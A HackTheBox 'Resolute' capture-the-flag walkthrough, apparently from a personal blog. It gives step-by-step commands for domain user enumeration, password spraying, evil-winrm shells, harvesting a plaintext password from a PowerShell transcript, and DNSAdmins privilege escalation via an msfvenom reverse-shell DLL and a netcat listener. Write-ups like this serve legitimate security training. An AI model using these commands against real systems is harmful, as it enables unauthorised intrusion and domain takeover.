HackTheBox - Resolute | Walkthrough

HackTheBox - Resolute | Walkthrough


nmap -A

enum4linux > enum

cat enum | grep "Account:"

You should see some accounts and some creds
Make a user list from it

cat enum | grep "Account:" | cut -d " " -f8 > user_list

search smb_login
use auxiliary/scanner/smb/smb_login
set SMBPass 'Welcome123!'
set USER_FILE ~/HTB/Resolute/user_list

You should see that it works for one user, melanie.


Now, let's use evil-winrm to see if we can get a shell

cd ~/HTB/Resolute/
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm/

ruby evil-winrm.rb -> It gives an error, we need some dependencies first

cat Gemfile -> checking for dependencies

gem install winrm winrm-fs colorize stringio

ruby evil-winrm.rb -> shows a help menu

ruby evil-winrm.rb -u melanie -p 'Welcome123!' -i

You should get a shell!

User 2

cd ..
type Desktop\user.txt 


cd C:\
dir -h
cd PSTranscripts
dir -h
cd 20191203
type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

You should get the creds of another user, Ryan
make a new file creds and save it there, it might come in handy later

ruby evil-winrm.rb -u ryan -p Serv3rAdmin4cc123! -i


whoami /all

Now, I really recommend you check my another blog post regarding this privesc process as it is way more detailed than this: https://abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/

We can see that he is a member of DNSAdmin group
Googling about it tells us about a vulnerability, dns injection, that we can use to privilege escalate.

in another terminal tab,

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4444 --platform=windows -f dll > ~/HTB/Resolute/share/plugin.dll
cd /usr/share/doc/python3-impacket/examples
./smbserver.py SHARE ~/HTB/Resolute/share/

And in another tab, set up a netcat listener:
nc -nvlp 4444

Now, in the windows machine,

dnscmd.exe Resolute.megabank.local /config /serverlevelplugindll \\\share\plugin.dll
sc.exe stop dns
sc.exe start dns

Now, you should get a reverse shell in your netcat listener!

type C:\Users\Administrator\Desktop\root.txt